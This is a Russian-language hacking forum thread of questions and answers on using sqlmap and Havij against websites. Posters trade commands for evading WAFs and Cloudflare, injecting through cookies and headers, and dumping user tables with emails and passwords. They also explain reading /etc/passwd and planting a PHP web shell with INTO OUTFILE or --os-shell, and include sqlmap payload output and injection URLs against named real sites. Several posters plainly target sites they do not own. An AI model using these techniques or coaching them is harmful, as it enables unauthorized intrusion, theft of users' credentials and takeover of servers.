Вопросы по SQLmap и Havij оставляем только здесь

Вопросы в других темах будут переноситься сюда или удаляться. Пожалуйста, не забывайте использовать тег [CODE].

Официально руководство: https://github.com/sqlmapproject/sqlmap/wiki/Usage

Очень актуальная тема для меня сейчас.

Прошу помочь определится, в чем разница кроме интерфейса между sqlmap и sqli dumper?

vikler (https://antichat.live/members/207861/) Member


тебе поможет --help и изучи возможности

https://github.com/sqlmapproject/sqlmap/tree/master/tamper в частности помогает вот этот скрипт частенько space2mssqlblank.py (https://github.com/sqlmapproject/sqlmap/blob/master/tamper/space2mssqlblank.py)



Code Hunter (https://antichat.live/members/47022/) New Member


sqlmap это швейцарский нож, думаю больше ничего аргументировать и не надо

-=Cerberus=- said:
↑ (https://antichat.live/posts/3899576/)


vikler (https://antichat.live/members/207861/) Member

тебе поможет --help и изучи возможности
https://github.com/sqlmapproject/sqlmap/tree/master/tamper
в частности помогает вот этот скрипт частенько
space2mssqlblank.py (https://github.com/sqlmapproject/sqlmap/blob/master/tamper/space2mssqlblank.py)


Code Hunter (https://antichat.live/members/47022/) New Member

sqlmap это швейцарский нож, думаю больше ничего аргументировать и не надо


Я использовала сто раз tamper scripts, но тут же оракл, а они для mysql/mssql

Как через sqlmap обойти можно cloudflare?

sysjuk said:
↑ (https://antichat.live/posts/3899612/)
Как через sqlmap обойти можно cloudflare?


First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR (https://www.torproject.org/) to access the target.

Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

Прежде всего, вы должны убедиться, что целевой сайт защищен Cloudflare, вы можете добавить "--identify-WAF" или "--check-WAF" для подтверждения. Не используй "--thread =" больше, 1 потока тк это даст вам "403 Forbidden" сообщение об ошибке. Как только вы получите "ошибку" 403, Ваш IP будет запрещен. Таким образом, вы должны рассмотреть возможность использования прокси-серверов или TOR для доступа к цели.

Второе что, вам нужно добавить "--tamper = 'between,randomcase,space2comment'" и "-v 3", в принципе этого будет достаточно чтобы cloudflare отьебался. Вы также можете рассмотреть вариант с добавлением "--random-агент" и "--tor", когда это необходимо.

Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать?

и еще, как сдампить конкретно админов по группам.

sysjuk said:
↑ (https://antichat.live/posts/3900680/)
Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать?
и еще, как сдампить конкретно админов по группам.


--where="условие" типа userid>5000, только с реальным именем колонки

sysjuk said:
↑ (https://antichat.live/posts/3900680/)
10000юзеров, мне нужно с 5000 начать дампить, как это сделать?
и еще, как сдампить конкретно админов по группам.


--start=5000

--sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа

Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы.

https://github.com/sqlmapproject/sqlmap/wiki/Usage

grimnir said:
↑ (https://antichat.live/posts/3901308/)
--start=5000
--sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа
Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы.
https://github.com/sqlmapproject/sqlmap/wiki/Usage


sql-qure="запрос"

Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку)

.SpoilerTarget" type="button">Spoiler: Открыть/закрыть


Code:
sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables
[00:48:09] [INFO] resuming back-end DBMS 'mysql'
[00:48:09] [INFO] testing connection to the target URL
[00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS
---
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.19-log'
[00:48:20] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]


Перебирая не находит то что нужно( бд по букве хоть но вывел

а так: [ERROR] unable to retrieve the table names for any database

kacergei said:
↑ (https://antichat.live/posts/3901419/)
Перебирая не находит то что нужно( бд по букве хоть но вывел
а так:
[ERROR] unable to retrieve the table names for any database


Попробуйте варианты

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --hex -v3 --is-dba

sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --no-cast -v3

посмотреть причину ошибки по логу или возможно, нет прав

Господа хорошие, подскажите пожалуйста.

Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?

И правильно ли я формирую запрос (http)?

Спасибо.

http://screenshotuploader.com/i/1510/hsw-k.png

ol1ver said:
↑ (https://antichat.live/posts/3901767/)
Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.
http://screenshotuploader.com/i/1510/hsw-k.png


попробуйте убрать -p "login" и в куках которые вы указали после значения логина добавить символ *

должно получиться чтото вроде --cookie="login=mylogin*"

ol1ver said:
↑ (https://antichat.live/posts/3901767/)
Господа хорошие, подскажите пожалуйста.
Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
И правильно ли я формирую запрос (http)?
Спасибо.
http://screenshotuploader.com/i/1510/hsw-k.png


добавь --level=2

https://github.com/sqlmapproject/sqlmap/wiki/Usage


Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to
2
or above.

Можно ли sqlmap сканнировать такой запрос:

sqlmap.py -u "site.ru/add/%27"

Или какой софт сканерует такой запрос ?

WallHack (https://antichat.live/members/244713/) присоединяюс тоже интересно

WallHack said:
↑ (https://antichat.live/posts/3902068/)
Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?


sqlmap.py -u "site.ru/add/*"

Попробуй sqlmap.py -u "site.ru/add/*"

gmiller said:
↑ (https://antichat.live/posts/3902150/)
Попробуй sqlmap.py -u "site.ru/add/*"




xivi00 said:
↑ (https://antichat.live/posts/3902136/)
WallHack (https://antichat.live/members/244713/)
присоединяюс тоже интересно




WallHack said:
↑ (https://antichat.live/posts/3902068/)
Можно ли sqlmap сканнировать такой запрос:
sqlmap.py -u "site.ru/add/%27"
Или какой софт сканерует такой запрос ?


Что это за бред? Обычная sql льется без проблем, вместо %27'' ставишь * и льешь

Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1;

уязвим параметр session_id, sqlmap не может раскрутить, в чем проблема?

и еще вопрос, как быть если уязвимый параметр X-Forwarded-For?

RedFern.89 said:
↑ (https://antichat.live/posts/3902757/)

Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1;

уязвим параметр session_id, sqlmap не может раскрутить, в чем проблема?
--url=
http://prodota.ru/news/
--cookie=__cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151 443527442; session_id=1*;
и еще вопрос, как быть если уязвимый параметр X-Forwarded-For?


--headers="X-Forwarded-For: *"

grimnir said:
↑ (https://antichat.live/posts/3902775/)
--headers="X-Forwarded-For: *"


а по поводу первого вопроса?

RedFern.89 said:
↑ (https://antichat.live/posts/3902804/)
а по поводу первого вопроса?


Не знаю,я сайты не ломаю

содержимое колонки типа blob, в процессе дампа символы в другой кодировке, как вывести данный тип?

.SpoilerTarget" type="button">Spoiler
http://6.firepic.org/6/images/2015-10/17/tprgx7om9ja7.png (http://firepic.org/)
процесс дампа

.SpoilerTarget" type="button">Spoiler
http://6.firepic.org/6/images/2015-10/17/izc5x8c07zer.png (http://firepic.org/) http://6.firepic.org/6/images/2015-10/17/63mvf73fw5gi.png (http://firepic.org/)

Если кому не трудно распишите все способы залива шела через sqlmap и так же ключи для раскрытия путей чтения файлов, очень долго с этим мучаюсь немогу разобраться

Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.

http://screenshotuploader.com/i/1510/bzm_t.png

ol1ver said:
↑ (https://antichat.live/posts/3905201/)
Раз и вдруг sqlmap перестал работать. На ввод команд не реагирует. С Python все нормально, ничего не переносил. С АВ sqlmap дружил.
http://screenshotuploader.com/i/1510/bzm_t.png


такое бывает.удали папку и скачай по новой sqlmap и все заработает

xivi00 said:
↑ (https://antichat.live/posts/3905208/)
такое бывает.удали папку и скачай по новой sqlmap и все заработает


ага


[11:50:05] [INFO] retrieved: ???????????????
[11:50:05] [INFO] retrieving the length of query output
[11:50:05] [INFO] retrieved: 9
[11:50:20] [INFO] retrieved: ?????????
[11:50:20] [INFO] retrieving the length of query output
[11:50:20] [INFO] retrieved: 6


Уважаемые, делаю дамп таблицы. Как с этим бороться? Можно самому задать кодировку вывода?

ol1ver said:
↑ (https://antichat.live/posts/3905253/)
ага
Уважаемые, делаю дамп таблицы. Как с этим бороться? Можно самому задать кодировку вывода?


Правельно мыслишь)А лучше сливай дампером а не sqlmap

http://screenshotuploader.com/i/1510/9-k6q.png

Уважаемые, кто нибудь использовал советы (что в красной рамке)? Думал вот вот раскручу - fail.

ol1ver said:
↑ (https://antichat.live/posts/3905409/)
http://screenshotuploader.com/i/1510/9-k6q.png
Уважаемые, кто нибудь использовал советы (что в красной рамке)? Думал вот вот раскручу - fail.


Ну ты вручную посмотри, есть там что раскручивать или нет! Значит просто ничего нет

ЛИБО, если вручную можешь, то в зависимтои от того, какой вид уязвимости. Иногда надо под высоким risk/level

--risk 3 --level 5

Как правельно в sqlmap е крутить error bazed что то даже хавидж справляеться а он нет)

Как можно вытащить значение из ячейки? Грешу что криптуется AES (а ключа я не знаю). В mysql запросах не силен.

Как бороться? Спасибо!

Знаю что значение состоит из 16и знаков (integer), может брут?

http://screenshotuploader.com/i/1511/q1gx8.png

ol1ver said:
↑ (https://antichat.live/posts/3910262/)
Как можно вытащить значение из ячейки? Грешу что криптуется AES (а ключа я не знаю). В mysql запросах не силен.
Как бороться? Спасибо!
Знаю что значение состоит из 16и знаков (integer), может брут?
http://screenshotuploader.com/i/1511/q1gx8.png


Надо так

./sqlmap.py -u "url" --binary-fields=COLUMN_NAME --sql-shell

А дальше делать твой SELECT COLUMN_NAME from Customeres ну и т.д.

Судя по выводу данные хранятся в двоичном представлении. Я так мучилась долго с одним сайтом. Потом просто указала, что данные из проблемной колонки выводить в двоичном представлении, и нормально всё вышло

Подскажите пожалуйста, как можно указать две url в sqlmap. Одну для отправки инъекции, вторую для чтения ошибки.

./sqlmap.py -u "url" -v 3

errorbaser said:
↑ (https://antichat.live/posts/3910819/)
Подскажите пожалуйста, как можно указать две url в sqlmap. Одну для отправки инъекции, вторую для чтения ошибки.




Code:
sqlmap.py -u "http://example.com/test.php?id=1" --second-order="http://example.com/result.php"

Привет друзья. Подскажите, как сохранить дамп в sqlmap?

Можно ли сейвить в процессе слива или нужно стопать?

Понадобилось первый раз слить всю таблицу, в ней 10К+ записей

Но проблема в том что сайт иногда падает, да и мой пк тоже не подарок может в любой момент вырубиться

Суть вопроса, как сдампить что бы sqlmap сохранял с определенным интервалом (что бы если что продолжить)

kacergei said:
↑ (https://antichat.live/posts/3915259/)
Суть вопроса, как сдампить что бы sqlmap сохранял с определенным интервалом (что бы если что продолжить)


Мап автоматом продолжит дампить с того места, где он остановился в прошлый раз.

sqlmap работает с XPATH syntax error ?

powerOfthemind said:
↑ (https://antichat.live/posts/3915354/)
sqlmap работает с XPATH syntax error ?


http://sqlmap.org/

Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.

powerOfthemind said:
↑ (https://antichat.live/posts/3915354/)
sqlmap работает с XPATH syntax error ?


да

Посмотреть какие вообще техники иньекций использует sqlmap можно тут https://github.com/sqlmapproject/sqlmap/tree/master/xml/payloads

Подскажите Делаю дамп таблицы users к примеру все нормально

потом регистрирую пользователя и опять делаю дамп, но sqlmap грузит старые данные как добавить к запросу то что бы он заного вытащил актуальные данные, не очищать же постоянно /.sqlmap/output

kacergei said:
↑ (https://antichat.live/posts/3915980/)
Подскажите Делаю дамп таблицы users к примеру все нормально
потом регистрирую пользователя и опять делаю дамп, но sqlmap грузит старые данные как добавить к запросу то что бы он заного вытащил актуальные данные, не очищать же постоянно /.sqlmap/output


не уверен, но попробуйте добавить условие типа --where="id>15"

yarbabin said:
↑ (https://antichat.live/posts/3915994/)
не уверен, но попробуйте добавить условие типа --where="id>15"


попробовал не помогло((

winstrool said:
↑ (https://antichat.live/posts/3915440/)
да
Посмотреть какие вообще техники иньекций использует sqlmap можно тут
https://github.com/sqlmapproject/sqlmap/tree/master/xml/payloads


нет не работает он с XPath inj.


powerOfthemind said:
↑ (https://antichat.live/posts/3915354/)
sqlmap работает с XPATH syntax error ?


Юзай Xpath blind explorer. Он кривой но хоть чтото. Если будут проблемы - пишите помогу.

psihoz26 said:
↑ (https://antichat.live/posts/3917189/)
нет не работает он с XPath inj.
Юзай Xpath blind explorer. Он кривой но хоть чтото. Если будут проблемы - пишите помогу.


НЕТ, РАБОТАЕТ!!!

https://github.com/sqlmapproject/sqlmap/blob/master/xml/payloads/02_error_based.xml

Вот выдержка из реализации payloads в sqlmap:


OR
EXTRACTVALUE
([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
..............
AND
UPDATEXML
([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])



вот примеры функций что юзаются:

_ttp://staynaughty.com/wall.php?uid=442+or(ExtractValue(1,version()))

_ttp://staynaughty.com/wall.php?uid=442+or(UPDATEXML(1,version(),2))

winstrool said:
↑ (https://antichat.live/posts/3917207/)
НЕТ, РАБОТАЕТ!!!
https://github.com/sqlmapproject/sqlmap/blob/master/xml/payloads/02_error_based.xml
Вот выдержка из реализации payloads в sqlmap:
вот примеры функций что юзаются:
_ttp://staynaughty.com/wall.php?uid=442+or(
ExtractValue
(1,version()))
_ttp://staynaughty.com/wall.php?uid=442+or(
UPDATEXML
(1,version(),2))


я немного нетак понял видать


powerOfthemind said:
↑ (https://antichat.live/posts/3915354/)
sqlmap работает с XPATH syntax error ?


ты имеешь ввиду эксплуатацию SQL инъекций через xml функции?

или эксплуатацию Xpath инъекций? (https://www.owasp.org/index.php/XPATH_Injection)

всем привет, есть вопрос (многие сталкивались наверное) нахожу базу, при попытке запроса таблицы получаю ответ от мапа, таблица не найдена тут можно 2 варианта --no-cast или -hex ну или пробует перебором найти из предложенных таблиц, а может можно как-то наверняка (пусть и даже медленно) в некоторых случаях мап по буквам восстанавливает или еще какие изощрения по выыытягиванию таки данных

вопрос, пытаюсь прочитать файл /etc/passwd (time based blind)

права есть, но sqlmap ругается. Что здесь не так?

http://i.imgur.com/VWBqyy7.png

Попробуйте выставить больше таймаут

Всем привет! Аналогичный вопрос как и у Bobrenz.Не получается подобрать имена таблиц. Может кто нибудь что посоветует? Может у кого есть словарь для брута таблица и колонок? Ну и готов поделить, тому кто поможет, жирной иньекцией, на популярном сайте!

Bobrenz said:
↑ (https://antichat.live/posts/3920113/)
всем привет, есть вопрос (многие сталкивались наверное) нахожу базу, при попытке запроса таблицы получаю ответ от мапа, таблица не найдена тут можно 2 варианта --no-cast или -hex ну или пробует перебором найти из предложенных таблиц, а может можно как-то наверняка (пусть и даже медленно) в некоторых случаях мап по буквам восстанавливает или еще какие изощрения по выыытягиванию таки данных


Какая версия? Если нет information_schema => только брут

или у тебя вообще не MySQL?

Есть ещё такие варианты:

1) Есть ограничение подключений на сервере. Так было на одном сайте: там была boolean, но при дампе имена таблиц не выдавались. Сработало действовать в один поток только

2) Может быть фильтрация , (запятых), тогда нужно tamper script использовать:

тот, что в новой версии мапа. Типа флаги --fresh-queries --tamper=commalessmid

Всем привет . Друзья нужна ваша помощь . Никак не могу раскрутить скулю . Есть сайт с такой вот ошибкой http://prntscr.com/9fkal3 . Ни дампер ни хавик его не берет. Начинаю крутить мапом выхоит сообщение http://prntscr.com/9fkb4l дальше идет http://prntscr.com/9fkbza и все потом ошибка (((( http://prntscr.com/9fl0mq друзья кто может подсказать как раскрутить ... Всем спасибо за внимание

Ребят подскажите пожалуйста ,если дампим мепом базу , иногда теряется конект ,а база относительно большая 1кк .И после того как он задампил 300к примерно ,потерялся конект и снова пришлось запускать ,при этом он стал проверят и додампивать предыдущие 300к .Как пропустить эти 300к ,что бы дампило откуда где закончило ?

Xsite said:
↑ (https://antichat.live/posts/3929869/)
Ребят подскажите пожалуйста ,если дампим мепом базу , иногда теряется конект ,а база относительно большая 1кк .И после того как он задампил 300к примерно ,потерялся конект и снова пришлось запускать ,при этом он стал проверят и додампивать предыдущие 300к .Как пропустить эти 300к ,что бы дампило откуда где закончило ?


Он автоматом это делает, начинает с места разрыва

BabaDook said:
↑ (https://antichat.live/posts/3929920/)
Он автоматом это делает, начинает с места разрыва


понятно дело что он начинает с места разрыва ,только перед этим он идет "проверять" сколько сдампилось и с какого место начинать ,то есть он проверяет допустим оч долго теже 300к и ищет откуда начинать ,вот и спрашиваю ,как дампить с определенного места ,что бы он не проверял

Xsite said:
↑ (https://antichat.live/posts/3929940/)
понятно дело что он начинает с места разрыва ,только перед этим он идет "проверять" сколько сдампилось и с какого место начинать ,то есть он проверяет допустим оч долго теже 300к и ищет откуда начинать ,вот и спрашиваю ,как дампить с определенного места ,что бы он не проверял


Всё, я понял ваш вопрос. Честно говоря без понятия... Так много не дампил ))

Xsite said:
↑ (https://antichat.live/posts/3929940/)
понятно дело что он начинает с места разрыва ,только перед этим он идет "проверять" сколько сдампилось и с какого место начинать ,то есть он проверяет допустим оч долго теже 300к и ищет откуда начинать ,вот и спрашиваю ,как дампить с определенного места ,что бы он не проверял


--start=n

где n - номер записи с которой начинать дамп

ktulhu777 said:
↑ (https://antichat.live/posts/3928982/)
Всем привет . Друзья нужна ваша помощь . Никак не могу раскрутить скулю . Есть сайт с такой вот ошибкой
http://prntscr.com/9fkal3
. Ни дампер ни хавик его не берет. Начинаю крутить мапом выхоит сообщение
http://prntscr.com/9fkb4l
дальше идет
http://prntscr.com/9fkbza
и все потом ошибка ((((
http://prntscr.com/9fl0mq
друзья кто может подсказать как раскрутить ... Всем спасибо за внимание


Там WAF не самый тоскливый стоит - реагирует практически на все. Не факт что sqlmap так просто с ним справится. Попробуй конечно тамперами пройтись, но меня терзают смутные сомнения...

И да - задержку еще попробуй секунд до 5 увеличить - WAF блокирует ип при ошибках примерно на 3-5 сек.

Подумал и решил дописать - в данном случае эффективнее будет руками работать. Я так думаю.

Ребята кто подскжет функции для обхода WAf ??? Когда пытаюсь рутить скулю руками блочит ип http://prntscr.com/9gqj9m я так понимаю это реагирует этот чертов WAF... Был бы очень признателен за любу помощь в идеале по джпберу или скупу

Помогите застрял на этом: http://rghost.ru/6mLmfsYLb.view

Как мне залить shell поподробнее пожалуйста обьясните!!!

Legionanonymous said:
↑ (https://antichat.live/posts/3934129/)
Помогите застрял на этом:
http://rghost.ru/6mLmfsYLb.view
Как мне залить shell поподробнее пожалуйста обьясните!!!


1)Надо узнать полный путь /home/www/ .... /'

2)запрос --is-dba то есть права админа на запись ,если False ,то облом

3)Можешь средставми SQLMAP --os-shell и указываешь полный путь home/www/serv1/

ИЛИ как на твоем скрине


Code:
select '' into outfile '/home/www/ .... /shell.php'

Дальше путь до шелла shell.php?cmd=команда;

grimnir said:
↑ (https://antichat.live/posts/3934136/)
1)Надо узнать полный путь /home/www/ .... /'
2)запрос --is-dba то есть права админа на запись ,если False ,то облом
3)Можешь средставми SQLMAP --os-shell и указываешь полный путь home/www/serv1/
ИЛИ как на твоем скрине

Code:
select '' into outfile '/home/www/ .... /shell.php'

Дальше путь до шелла shell.php?cmd=команда;


по средства --is-dba --random-agent я узнал что права TRUE.

Далее делаю как Вы и сказали т.е index.php?id=1 --os-shell --random-agent

И у меня показывает вот такую ошибку постоянно, и без --random-agent тоже.

http://rghost.ru/7y2N7VBtJ.view

Как быть?

Legionanonymous said:
↑ (https://antichat.live/posts/3934154/)
по средства --is-dba --random-agent я узнал что права TRUE.
Далее делаю как Вы и сказали т.е index.php?id=1 --os-shell --random-agent
И у меня показывает вот такую ошибку постоянно, и без --random-agent тоже.
http://rghost.ru/7y2N7VBtJ.view
Как быть?


Блокирует запросы, там или WAF стоит , пробуйте так -o --delay=1 --retries=15

grimnir said:
↑ (https://antichat.live/posts/3934164/)
Блокирует запросы, там или WAF стоит , пробуйте так -o --delay=1 --retries=15


Подскажи плиз ещё кое что, тут как быть это уже другой сайт, права здесь тоже TRUE, что тут указывать!???

http://rghost.ru/7zjZgGh7x.view

Legionanonymous said:
↑ (https://antichat.live/posts/3934180/)
Подскажи плиз ещё кое что, тут как быть это уже другой сайт, права здесь тоже TRUE, что тут указывать!???
http://rghost.ru/7zjZgGh7x.view


тут нужно укзаывать полный путь, который обычно можно получить при раскрытии путей (https://www.owasp.org/index.php/Full_Path_Disclosure)

Нужно указать путь так ,чтобы туда были права на запись (директория tmp,изображений и т.д)

как вариант можно попробовать пункт 4 и сбрутить, но шанс небольшой

grimnir said:
↑ (https://antichat.live/posts/3934238/)
тут нужно укзаывать полный путь, который обычно можно получить при раскрытии путей (
https://www.owasp.org/index.php/Full_Path_Disclosure
)
Нужно указать путь так ,чтобы туда были права на запись (директория tmp,изображений и т.д)
как вариант можно попробовать пункт 4 и сбрутить, но шанс небольшой


Файл /etc/password получилось скачать и просмотреть там логи какие то. Но вот как именно узнать есть или нету права на запись в какой нибудь папке не могу вкурить, и пример команды для залития шелла можно пожалуйста.

Legionanonymous said:
↑ (https://antichat.live/posts/3934245/)
Файл /etc/password получилось скачать и просмотреть там логи какие то. Но вот как именно узнать есть или нету права на запись в какой нибудь папке не могу вкурить, и пример команды для залития шелла можно пожалуйста.


а полный путь у вас уже есть? вида /home/www/ ??

Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь

"пример команды для залития шелла можно пожалуйста."


Code:
select '' into outfile '/home/www/ тут каталог с правами на запись /shell.php'

grimnir said:
↑ (https://antichat.live/posts/3934304/)
а полный путь у вас уже есть? вида /home/www/ ??
Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь
"пример команды для залития шелла можно пожалуйста."

Code:
select '' into outfile '/home/www/ тут каталог с правами на запись /shell.php'



Полного пути нету, я хз как его найти, пожалуйста братюнь обьясни чё по чём, или напиши в лс я тебе дам ссылку сайта может подскажешь, очень нужен сайт этот

раньше выводились все данные нормально, сегодня пробую и вот такое:

http://ipic.su/img/img7/fs/kiss_20kb.1451566836.png

среди доступных бд было 4, теперь одна и невозможно ничего вывести. перепроверил - уязвимость осталась. как я понимаю доступа к бд больше нет? не могу даже через --sql-shell select version() вывести.

--tamper="between,randomcase,space2comment" -v 3 и -D db_site --tables --technique=B --no-cast -v3 пробовал - не помогло

Всем привет.

Подскажите пожалуйста люди умные, люди смелые для чего нужны функции

--alert

--eval

Ребята, всем привет, я новенький и сразу с вопросом))

Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??

ph03nix said:
↑ (https://antichat.live/posts/3937243/)
Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??


sqlmap.py -u "http://www.site.com/ уязвимый параметр" --technique=B

Shubka75 said:
↑ (https://antichat.live/posts/3937252/)
sqlmap.py -u "
http://www.site.com/
уязвимый параметр" --technique=B


Так, спасибо, но не понял, уязвимый параметр это что то типа "index.php?id=", дело в том что ZAP выдал уязвимость на странице "http://site.ru/"

Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.

0x1d said:
↑ (https://antichat.live/posts/3937453/)
Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.


-C email,password --where="userID=1" --dump

vikler said:
↑ (https://antichat.live/posts/3926798/)
Какая версия? Если нет information_schema => только брут
или у тебя вообще не MySQL?
Есть ещё такие варианты:
1) Есть ограничение подключений на сервере. Так было на одном сайте: там была boolean, но при дампе имена таблиц не выдавались. Сработало действовать в один поток только
2) Может быть фильтрация , (запятых), тогда нужно tamper script использовать:
тот, что в новой версии мапа. Типа флаги --fresh-queries --tamper=commalessmid


есть мскл версия 3, а вот инфо схемы увы нет

BabaDook said:
↑ (https://antichat.live/posts/3937060/)
Всем привет.
Подскажите пожалуйста люди умные, люди смелые для чего нужны функции
--alert
--eval


eval выполняет ваш код на питоне. например, если нужно сделать какое-то действие после запроса. сергей белов описывал http://habrahabr.ru/company/dsec/blog/243947/

alert может сделать оповещение, если sqlmap нашел sqli

yarbabin said:
↑ (https://antichat.live/posts/3937588/)
eval выполняет ваш код на питоне. например, если нужно сделать какое-то действие после запроса. сергей белов описывал
http://habrahabr.ru/company/dsec/blog/243947/
alert может сделать оповещение, если sqlmap нашел sqli


Спасибо, жалко что на php не выполняет

Как можно найти админку с помощью sqlmap?

.Light. said:
↑ (https://antichat.live/posts/3937931/)
Как можно найти админку с помощью sqlmap?


если есть таблица типа site_config,settings,options можно там поискать. А вообще лучше дирбастером по словарю,гуглом,бингом,исхо� �ники и т.д

.Light. said:
↑ (https://antichat.live/posts/3937931/)
Как можно найти админку с помощью sqlmap?




grimnir said:
↑ (https://antichat.live/posts/3937935/)
если есть таблица типа site_config,settings,options можно там поискать. А вообще лучше дирбастером по словарю,гуглом,бингом,исхо� �ники и т.д


Всё нашлось за секунды! И без всяких site_config,settings, options!

Хотя, иногда всё бывает куда сложнее...

Имеется скуля в error'е, как узнать операционную систему? Пробовал --banner, однако там только версия мускула.

--os пробывал?

хи хи nmap -O host

AppS said:
↑ (https://antichat.live/posts/3938109/)
--os пробывал?


Это для выбора операционки, а так он не отображает ОС.


BabaDook said:
↑ (https://antichat.live/posts/3938126/)
хи хи nmap -O host


Спасибо, помогло)))

Помогите, ребят. Как сохранить информацию из session.sqlite ? Делала длительно select col1,col2 from table через sqlshell, потом сессию прераали, уязвимость закрыли. в файл log ничего не сохранилось, но в session.sqlite есть данные. Как их сохранить в нормально (структурированном) виде в .txt или .csv? через sqlite3 смотрю, там они ВООБЩЕ не упорядочены

Неужели вся работа коту под хвост? Спасите советом!

vikler said:
↑ (https://antichat.live/posts/3938807/)
Помогите, ребят. Как сохранить информацию из session.sqlite ? Делала длительно select col1,col2 from table через sqlshell, потом сессию прераали, уязвимость закрыли. в файл log ничего не сохранилось, но в session.sqlite есть данные. Как их сохранить в нормально (структурированном) виде в .txt или .csv? через sqlite3 смотрю, там они ВООБЩЕ не упорядочены
Неужели вся работа коту под хвост? Спасите советом!


--dump-format=HTML/SQLITE/CVS --dump. Мне больше всего нравиться вариант с HTML'ом.

Filipp said:
↑ (https://antichat.live/posts/3938828/)
--dump-format=HTML/SQLITE/CVS --dump. Мне больше всего нравиться вариант с HTML'ом.


а как запускать ? это флаги для мапа? если яузвимость уже закрыли, то бесполезно заново же запускать,не?

EDIT: видно не поняли из моего сообщения... Я не делала дамп.

Я делала ./sqlmap.py -u "http:// (https://antichat.live/)...." --sql-shell

а в шелле команды типа

select column1,column2,column3 from tablename;

Но сессию прервали, уязвимость закрыли. в файл "log" мапа ничего не сохранилось. Есть только sqlite3-файл (session.sqlite), посмотрела там все данные целы, но из них каша. Как их сдампить упорядочено? Ну неужели нельзя? Неужели никто не сталкивался? Я в отчаянии!

Там в поле id - числовые параметры, которые, видимо, что-то значят для мапа. Но если просто сохранить в csv по id desc/asc, то каша.

К примеру username и password, которые выводились вместе попадают совсем в разные места по id:

id: 231466888577923 => тут в value username

id: 258384382848014 => тут в value password, соотв username

Так что и вопрос...как сохранить данные нормально,а?

vikler said:
↑ (https://antichat.live/posts/3938847/)
а как запускать ? это флаги для мапа? если яузвимость уже закрыли, то бесполезно заново же запускать,не?
EDIT: видно не поняли из моего сообщения... Я не делала дамп.
Я делала ./sqlmap.py -u "
http:// (https://antichat.live/)
...." --sql-shell
а в шелле команды типа
select column1,column2,column3 from tablename;
Но сессию прервали, уязвимость закрыли. в файл "log" мапа ничего не сохранилось. Есть только sqlite3-файл (session.sqlite), посмотрела там все данные целы, но из них каша. Как их сдампить упорядочено? Ну неужели нельзя? Неужели никто не сталкивался? Я в отчаянии!
Там в поле id - числовые параметры, которые, видимо, что-то значят для мапа. Но если просто сохранить в csv по id desc/asc, то каша.
